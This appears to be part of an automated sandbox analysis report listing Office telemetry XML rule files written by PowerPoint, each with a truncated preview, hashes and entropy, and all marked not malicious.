                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702600" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AutoTemplate" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAutoTemplate" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1408
                                                                                                                              Entropy (8bit):4.899679787486778
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9GgODFuct1k3BNjXMi+EsdnKE+2h6wl/FftI:cUBFucteNjXMzbdKshBde
                                                                                                                              MD5:760048411FFA7EFDE7E6B8ED20A65494
                                                                                                                              SHA1:B1E404A91A80EF2C6C2C27F9A668FEF563A6AAE5
                                                                                                                              SHA-256:F0212114B2FDD6CDB24B551C7D6BC8D2C3D29EC76EF1B38084024CF56115E6DB
                                                                                                                              SHA-512:9B12E04EC7FC64D55E554C8DDA522D499C7D5B22A6B924A8459BD7906227EE8F0AE1B922858E2D7A949B48DC40155115056D57942D1D35753A66E9FE2D4E706F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702601" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AutoTemplate.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAutoTemplate" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1357
                                                                                                                              Entropy (8bit):4.848587052076145
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9WFiDquMt1k3BNjXMi+EsdnKE+2h6wl/Ffo+p4i68:ccFiquMteNjXMzbdKshBdHpf
                                                                                                                              MD5:CE95C0A8A6ED5C107AD72EDC361BB27C
                                                                                                                              SHA1:687FC63DF62E09A10C2715E713628972BF77803F
                                                                                                                              SHA-256:D4D7BB7E1C072B2841268133186FC32E29405816E0654A34D1AFC418E67142C9
                                                                                                                              SHA-512:5691EC54B9C1AFA274B472C14D2753C9A1C48A1038DE5389A10B9E28B8C863AD772A0DDBDEBC24AC6F41B98A988C31F78C0CDB390133582DA2BC4CA9F1E6CE6B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.884966778735232
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9W6aDquct1k3BNjXMi+EsdnKE+2h6wl/Ffo+p4i68:cc66qucteNjXMzbdKshBdHpf
                                                                                                                              MD5:AAC474FF69C74EA0705CA7978F9E59F4
                                                                                                                              SHA1:AD3C65C507A6DE36B105C97E5056EB120F516329
                                                                                                                              SHA-256:F9F1E41E5C8832E20DB14D6F40A864F362BECB494B24559E32089E846487253E
                                                                                                                              SHA-512:99B3CD319762C4E52712138096A4B2B2EE62AE9A6799A78562002BDF5CD863BB99AD4095D1F34E00E52734F9AE89EE2DF89A2BD5BD9AE170ADE08AB76526875C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1366
                                                                                                                              Entropy (8bit):4.8662369056062404
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9wrsuDpuMt1k3BNjXMi+EsdnKE+2h6wl/Ff8EcK:c8sepuMteNjXMzbdKshBdUED
                                                                                                                              MD5:AFE1F0B2C50217E7CAE443AF21136F34
                                                                                                                              SHA1:AA679F19A69C907653C3A3FB062EFA0C9BDEDA88
                                                                                                                              SHA-256:5BBB64A464F1F1B58A42D578BD57D9836601B313C009F9AF63E9DC301E1AA208
                                                                                                                              SHA-512:CBC2D975370FB099552E29E9A5A07CDF676F1AF61498E211B6AA9F5DA98BD5128C97F216771260898A420F9A1582EB26AB62FD8E88FE38FE9619210AEA78EAB6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702700" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Docs.Apple" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDocsApple" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Ev
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1403
                                                                                                                              Entropy (8bit):4.901234050569788
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9wgs0JDpuct1k3BNjXMi+EsdnKE+2h6wl/Ff8EcK:cHs0ZpucteNjXMzbdKshBdUED
                                                                                                                              MD5:AF325C9B941D11C9232D4400E589A834
                                                                                                                              SHA1:42A1AE4434F085D0442E9B359F5064AAFC0DC252
                                                                                                                              SHA-256:E1F72F3EBD439D87AC24710E5E20D47B188D29943CD627C90BB363CD3E8AE667
                                                                                                                              SHA-512:4F50A3A296E831322401A5B493E8E403FEA02FE2612A5668D994B5AA0AE9B995F24E7D1472D61544F6F6952DDA73B8E62E337589CD164E36077DBD64A4D03937
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702701" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Docs.Apple.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDocsApple" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1365
                                                                                                                              Entropy (8bit):4.874109702881827
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9weSDKuMt1k3BNjXMi+EsdnKE+2h6wl/Ff1xs:cRyKuMteNjXMzbdKshBdg
                                                                                                                              MD5:64BF386BD9E91986551188D6A17C0411
                                                                                                                              SHA1:D2C6EF24870049E6C4B0593856D56B75801202EA
                                                                                                                              SHA-256:B976BF8C7EC165D88D602B113982457663A718EEB63B1B97A0B019E2AEB0CCBF
                                                                                                                              SHA-512:297F46DFE20739BFB328B6DCE2B362B08FC82D0BBDB676406197AAC7383635D886F9F7F185C66ADD4C66C57461EA32D513B56A56DE2A01C91E013C2F57A9F7D8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1402
                                                                                                                              Entropy (8bit):4.907444238942649
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9wZzeDKuct1k3BNjXMi+EsdnKE+2h6wl/Ff1xs:cWKKucteNjXMzbdKshBdg
                                                                                                                              MD5:07DA5CB0EB4215C6E66251D1D915B103
                                                                                                                              SHA1:A56A946240961B6739153B266E6F68A03B18B946
                                                                                                                              SHA-256:D6750361BA69395D8E827B93D0E350235CFB7E6DBCBFF632BCC8646D687CA00B
                                                                                                                              SHA-512:910CD40650AE804DE0D12DB3688326B04A64000178F119CCE76A82E25893336DC2FD45F34C1B1BA71E53FFDD8A3A0BED52CAE6B7AC25B053EA9065E521CFB5F2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1353
                                                                                                                              Entropy (8bit):4.853435750554847
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9zXD5uMt1k3BNjXMi+EsdnKE+2h6wl/Ff1e9:c1T5uMteNjXMzbdKshBd9I
                                                                                                                              MD5:53429B1DCE25B171CD3B10FB2ED28490
                                                                                                                              SHA1:B07A6E17CCC2A61CA88373A72461A5366C0B78AD
                                                                                                                              SHA-256:88723C7BEE9F58E5B21C44BEC8AC6D815B1966050D7D195FCC2A50467D0B7AD5
                                                                                                                              SHA-512:A38576D1E27CB258041904B9F702F4F82C61E00204824A804674F3C91C3AB818EBA5C9E0AA2A16C058263F4619FBA2753D7573184A09D1E63144D2DCB5099DC8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo">
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1390
                                                                                                                              Entropy (8bit):4.889693035476156
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9Aj1D5uct1k3BNjXMi+EsdnKE+2h6wl/Ff1e9:cq15ucteNjXMzbdKshBd9I
                                                                                                                              MD5:E816090F522A6E3DD7BAA2BCD68954BD
                                                                                                                              SHA1:7F4D28269BB944EE40782F11AE3F064EF687A138
                                                                                                                              SHA-256:5FB01AD53F0E2861A8487BA66E0793CE50181A69F7BA5B8FBB1C5B350199A18C
                                                                                                                              SHA-512:19C235A9679F8B6E2C92903C78DC00F68B56674E40D01B434EB2F145468440B4728CE1B319F50553FA6C700439093CD5388691ECE15C0A5249D1D6E6C64A969F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1367
                                                                                                                              Entropy (8bit):4.864270560319576
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9mVDfLuMt1k3BNjXMi+EsdnKE+2h6wl/Ffdd:cYVfLuMteNjXMzbdKshBdH
                                                                                                                              MD5:1D773D3AF285F5118515600DD911BFCA
                                                                                                                              SHA1:E20155A71B9AE5B75E3A611EF1C3410B17A8B7E1
                                                                                                                              SHA-256:A230DE9B438B55732875A58C8DE6D074C14AFC7096B49702C85F54FF43757F5C
                                                                                                                              SHA-512:AC932050B91E59C53984A2454DCE6C86309021598B5BE8B5967E6E1C1688599621C381E09C5FF36BCDDFF23B7EA2FBF7A1F0198745AC4E23BF935A1FE14A6A54
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702850" V="1" DC="SM" EN="Office.Telemetry.Event.Office.FileSystem" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFileSystem" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="E
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.89890901835996
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d95D+ODfLuct1k3BNjXMi+EsdnKE+2h6wl/Ffdd:cnD++fLucteNjXMzbdKshBdH
                                                                                                                              MD5:D5ECCBD7AA02D7C554E2E2090DAA48AB
                                                                                                                              SHA1:6CDA18520E3B88AEA015759E8890B17F369F4BD5
                                                                                                                              SHA-256:10827F68053A4626910C4CFF518EE6D262611CDCA7BFA58BFB026E981A4EFCAD
                                                                                                                              SHA-512:A37AB861277CB1F2987FF5F65D60FF77F631D83B2D596CB25895038FA33077FFC1F9E10E4B4974FF38BA9F82E54AD6C445DE709770452DCC50E3B39F02A94776
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702851" V="1" DC="SM" EN="Office.Telemetry.Event.Office.FileSystem.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFileSystem" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1373
                                                                                                                              Entropy (8bit):4.866360064001697
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9QbCy3Dn5FuMt1k3BNjXMi+EsdnKE+2h6wl/FffkNH:cSbpnLuMteNjXMzbdKshBdOH
                                                                                                                              MD5:0D9907663B5829E7ACC504F697A70EF4
                                                                                                                              SHA1:8C85C0173A1861B6C62DA9B040A42D9736AA009E
                                                                                                                              SHA-256:6A2EA9732AF530ED2B5F53726455E22A03FA2F1350DB86A30D7CB92778992245
                                                                                                                              SHA-512:D49E061429473AADD9B9338417B736320DA91B7E9F162D4B4A695249C62C0AA4523A1DA4AF4EFC1930AA1F71AB0B23CF2CB2F1F6C1B2AE416A36CDCF05341E53
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Manageability" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenManageability" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1410
                                                                                                                              Entropy (8bit):4.9005604200237975
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9uQbCyVDn5Fuct1k3BNjXMi+EsdnKE+2h6wl/FffkNH:ccQbfnLucteNjXMzbdKshBdOH
                                                                                                                              MD5:856B1A968638299EAD00ABF6E7EF741F
                                                                                                                              SHA1:B01A7DEDAA4E093DACFA8431363807D85D05FEBA
                                                                                                                              SHA-256:50EBC398555FE89CB0A37E45BDECEECC4F7A7BB644530FB2B76F94F6891661B2
                                                                                                                              SHA-512:6A49535E200E8E0AC00D81D86C3A0D3851EE72D39DE272C2A10C92EB067170AF6C61655EBA08E1EA6524A090DEC9D0F2E37F85A1CE7ABD58C6533B559ED2BD65
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Manageability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenManageability" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1367
                                                                                                                              Entropy (8bit):4.848792627939081
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9N92DJiuMt1k3BNjXMi+EsdnKE+2h6wl/Ff+8o:cn4QuMteNjXMzbdKshBdGN
                                                                                                                              MD5:851F6F8B8B7A6E3D931ABFDE1F6900FF
                                                                                                                              SHA1:988B6B78351513E1BA63CD204251B4F628148B25
                                                                                                                              SHA-256:DAB5941E15D0B7FDFFC854F7C386E79BE57EF123CDE6C65563A5B2A6D70C3736
                                                                                                                              SHA-512:1079C0957C6370DBCF488645CACE78E433BB4D3AD11B3262628556DFD4C5FA32844595FB612621A82271282F28E49921C7505CDCB4BAF9B649C8D79BCDE46EB1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="E
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
